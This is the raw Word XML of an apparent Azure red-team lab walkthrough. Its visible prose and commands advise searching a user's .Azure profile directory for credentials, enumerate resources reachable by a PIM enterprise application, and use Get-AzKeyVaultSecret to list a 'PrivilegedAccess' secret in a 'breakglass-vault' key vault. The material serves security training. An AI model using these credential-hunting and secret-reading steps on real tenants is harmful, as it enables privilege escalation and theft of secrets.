          <w:tcPr>
            <w:tcW w:w="393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EF70ACE"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Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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6667A26"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SubscriptionName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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468BA46"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TenantId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="28B2E116" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="393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D15282E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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5FB357EF"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26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E4142F6"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="0ABB42E8" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="393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171DD6F"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c>
          <w:tcPr>
            <w:tcW w:w="252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848E05D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="26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5ED41F22" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="492B674D" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="393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D0272CE" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="252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1FB2F56"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26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C53E2AA"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="1DB6968F" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6450" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2126E31F"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20eb5f4e-317a-4987-a384-298bf636f082 RetailCorp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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BE3D02F"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711c59fe-8dee-40c0-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="6DADAFEA" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="393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0BAAC9E"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adc1-ed08f738de43 AzureCloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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47CD383"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26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3CAFF37" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="1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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="659388CA" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="393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B429EC7" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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252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5D216C8" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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264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7C0AC01" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="45"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bl>
    <w:p w14:paraId="67F392D5" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="45" w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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Please take a note of the warning! Looking at the .Azure directory in a user profile is always recommended to get some credentials!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654F356" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="270" w:after="0" w:line="270" w:lineRule="atLeast"/>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Run the below command to enumerate Azure resources accessible to the PIM enterprise application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407EAAF" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2286"/>
        <w:gridCol w:w="6804"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="28C68346" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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EC2F725"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PS C:\AzAD\Tools&gt; Get-AzResource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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5890096D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="725B09EF" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="735"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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2A6E4C0"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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7A28F2A"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 breakglass-vault</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="560EE5A3" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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29990133"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ResourceGroupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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DCFC03D"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 Retail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7398ACDC" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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48C7343"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ResourceType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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B2E8B08"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 Microsoft.KeyVault/vaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="07CDF1B8" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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32C76F9" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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BDCFC76" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="0659BC73" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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2BED1D3" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="21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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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D84450C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="21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 germanywestcentral</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="1565923A" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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B9F3F26"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ResourceId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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746778F"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 /subscriptions/27ebe5b9-6e27-425a-8117-eeaab022575f/resourceGroups/</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>Retail/providers/Microsoft.KeyVault/vaults/breakglass-vault</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>Tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7B3D2363" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="219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4A77669" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="45" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="690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577694F3" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="45" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7383897E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="555" w:after="0" w:line="270" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:t>Sweet! We can read a key vault. Let's check if there are secrets in there and if we can read the secrets too!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183EA2C8" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9090"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="776DEF27" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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5F79DCF"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PS C:\AzAD\Tools&gt; Get-AzKeyVaultSecret -VaultName breakglass-vault</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F7CAD05" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1410"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="7320"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="468E42A7" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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D066A69"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Vault Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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A2D36ED" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="732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3A11ACF"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breakglass-vault</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="1ABDF704" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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5A9FD722"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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10D24B8" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="732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04679DE"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PrivilegedAccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7EB9D287" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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4BA253B" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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36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432F490" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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c>
          <w:tcPr>
            <w:tcW w:w="732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1DD37FD" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39CE7B48" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1230"/>
        <w:gridCol w:w="7860"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="3C2336A5" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="123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415C44E9"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786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BCC6AA0" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="2A00ECAB" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="123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2DF42C76"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Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786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B5A8084"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 https://breakglass-vault.vault.azure.net:443/secrets/PrivilegedAccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="46905CCE" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="123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0084361D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="45" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786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B1CAFC7" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="45" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B45256D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1410"/>
        <w:gridCol w:w="7680"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="2AC03D02" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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6B9913B"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Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768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805349C"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 True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="4C10AEAF" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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2BF144A1" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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Expires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768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61E2923A" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225" w:lineRule="atLeast"/>
